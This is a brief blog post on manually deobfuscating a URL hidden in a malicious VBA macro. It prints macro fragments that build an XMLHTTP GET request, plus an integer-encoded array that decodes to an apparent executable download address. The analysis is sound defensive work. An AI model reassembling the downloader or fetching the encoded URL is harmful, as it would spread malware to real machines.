Here's a quick run-down of how I manually de-Obfuscated a URL from Evil VBA Macro.
First I was looking at this evil VBA Macro, but it's obfuscated and difficult to determine what it's doing. After crawling the VBA for a bit I noticed this line
Set jsonParseString = CreateObject(M_Zorro + "icrosoft" + dot_hero + "XMLHTTP")
Which looks like it's trying to create an Activex object to browse a url. A bit later I see this code.
jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
Which looks like they're going to Send a "GET" request with that XMLHTTP object to a website. Notice though the URL is obfuscated, it's just a function call Redistribute(solov, 35). So I look a little higher and see that 'solov' is an array of integers (probably representing characters in the url).
solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
And then I see Redistribute is a function that likely converts those integers to the actual url.
Public Function Redistribute(Z() As Variant, oldLen As Integer) As String
Dim n As Integer
For n = LBound(Z) To UBound(Z)
Redistribute = Redistribute & Chr(Z(n) - 8 * oldLen - 4444)
Now I'm lazy, and I don't want to read or understand the evil code. I just want to "safely" run it. So I rip out only the necessary code. Rename a few variables so it makes more sense to me. Add a MsgBox to the end of the code. Drop it into an empty Microsoft Word document's Document_Open routine, and boom, I have my url.
Dim oldLen As Integer
oldLen = 35
Dim decodeURLFunction As String
Dim encodedUrl() As Variant
encodedUrl = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
Dim n As Integer
For n = LBound(encodedUrl) To UBound(encodedUrl)
decodeURLFunction = decodeURLFunction & Chr(encodedUrl(n) - 8 * oldLen - 4444)
Of course always do this in a lab, a safe environment. Make sure the code you cut & paste doesn't contain calls to the actual ActiveX objects because then evil things may happen on your lab box. Instead just ensure it's a bunch of string concatenation, character conversions, etc. and then add a safe MsgBox to pop up a message box with your info you wanted.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.